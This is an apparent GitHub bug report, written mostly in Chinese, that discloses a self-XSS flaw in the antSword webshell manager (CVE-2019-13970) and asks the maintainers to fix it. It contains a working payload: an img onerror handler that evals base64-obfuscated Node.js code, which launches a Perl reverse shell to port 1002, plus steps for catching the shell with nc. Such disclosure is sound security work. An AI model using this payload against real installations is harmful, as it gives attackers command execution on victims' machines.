Skip to content

antSword self-XSS Vulnerability leads to Code Execution(CVE-2019-13970) #151

Closed
@miaochiahao

Description

@miaochiahao

除了已知问题,这里还有一处输入点没有过滤,能够造成XSS并执行命令。

在主页添加一个shell,右键点击数据操作,进入数据库管理页面

屏幕快照 2019-04-18 下午6 32 40

在数据库地址处输入payload,这里的输入点没有过滤,直接执行

localhost<img src onerror="eval(new Buffer(`cmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoJ3BlcmwgLWUgXCd1c2UgU29ja2V0OyRpPSIxMjcuMC4w LjEiOyRwPTEwMDI7c29ja2V0KFMsUEZfSU5FVCxTT0NLX1NUUkVBTSxnZXRwcm90b2J5bmFtZSgidGNwIikpO2lmKGNvbm5lY3QoU yxzb2NrYWRkcl9pbigkcCxpbmV0X2F0b24oJGkpKSkpe29wZW4oU1RESU4sIj4mUyIpO29wZW4oU1RET1VULCI+JlMiKTtvcGVuKF NUREVSUiwiPiZTIik7ZXhlYygiL2Jpbi9iYXNoIC1pIik7fTtcJycsKGVycm9yLCBzdGRvdXQsIHN0ZGVycik9PnsKICAgIGFsZXJ 0KGBzdGRvdXQ6ICR7c3Rkb3V0fWApOwogIH0pOw==`,`base64`).toString())">

屏幕快照 2019-04-18 下午6 33 28

开启nc监听1002端口,即可接到反弹的shell

屏幕快照 2019-04-18 下午6 35 07

或者你只想弹个窗也行

屏幕快照 2019-04-18 下午6 35 46

self-xss也请修复一下 :D

Metadata

Metadata

Assignees

Labels

🐛Bug程序自身问题

Type

No type

Projects

No projects

Milestone

No milestone

Relationships

None yet

Development

No branches or pull requests

Issue actions